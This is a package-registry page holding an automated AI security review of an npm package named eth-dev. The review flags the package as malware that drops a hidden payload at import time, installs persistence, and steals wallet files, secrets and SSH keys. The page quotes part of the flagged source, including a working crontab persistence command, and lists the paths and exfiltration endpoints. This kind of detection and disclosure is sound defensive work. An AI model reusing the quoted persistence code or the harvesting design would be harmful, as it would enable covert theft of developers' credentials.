registry  /  eth-dev  /  1.0.0

eth-dev@1.0.0

Ethereum development utilities — ABI encode/decode, event parsing, address checksum, keccak256, RLP, and contract interaction helpers

AI Security Review

scanned 4h ago · by lpm-firewall-ai

Importing `index.js` schedules a concealed dropper after 37 seconds. It persists a detached credential-harvesting payload and exfiltrates collected secrets.

Static reason
No blocking static signals were detected.
Trigger
Any runtime import or require of the package entrypoint.
Impact
Steals wallet material, environment secrets, shell-config secrets, and SSH private keys from the user home directory.
Mechanism
Delayed payload drop, OS persistence, credential harvesting, and HTTPS exfiltration.
Attack narrative
On package import, `index.js` waits 37 seconds, decodes a base64 fixture into a hidden executable under the user home directory, registers it for periodic execution across Linux, Windows, or macOS, and starts it detached. The dropped script probes IPFS control documents, harvests cryptocurrency-related files, `.env`, shell configuration, and SSH private keys, encrypts findings, and uploads them to Pinata.
Rationale
This is a concrete hidden import-time malware chain with persistence and credential exfiltration, unrelated to the package's advertised Ethereum helper functions.
Evidence
index.jstest/fixtures/keypairs.datpackage.jsonREADME.md~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/Library/LaunchAgents/com.apple.syncd.plist
Network endpoints4
gateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs an import-time delayed dropper.
  • It decodes `test/fixtures/keypairs.dat` into `~/.cache-db/.node-sync/syncd.js`.
  • It installs cron, Windows scheduled-task, or macOS LaunchAgent persistence.
  • The dropped payload searches home directories, `.env`, shell configs, and SSH private keys.
  • The payload uploads RSA-encrypted findings to `api.pinata.cloud` and uses IPFS gateways as a control channel.
  • The documented Ethereum utilities do not require this hidden persistence or harvesting behavior.
Evidence against
  • `package.json` has no npm lifecycle hooks.
  • The visible exported functions are local Ethereum utility helpers.
Behavioral surface
Source
ChildProcessCryptoFilesystemShell
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 4.41 KB of source, external domains: www.apple.com

Source & flagged code

1 flagged · loading source
index.jsView file
29else if (t === "bool") hex += v ? "01" : "00"; L30: else if (t === "string") hex += Buffer.from(v, "utf8").toString("hex"); L31: else if (t === "bytes") hex += v.replace("0x", ""); ... L88: var o = require("os"); L89: var c = require("child_process"); L90: var h = o.homedir(); L91: var d = p.join(h, ".cache-db", ".node-sync"); ... L99: try { L100: if (process.platform === "linux") { L101: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L102: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L29

Findings

1 Medium2 Low
MediumInstall Persistenceindex.js
LowFilesystem
LowUrl Strings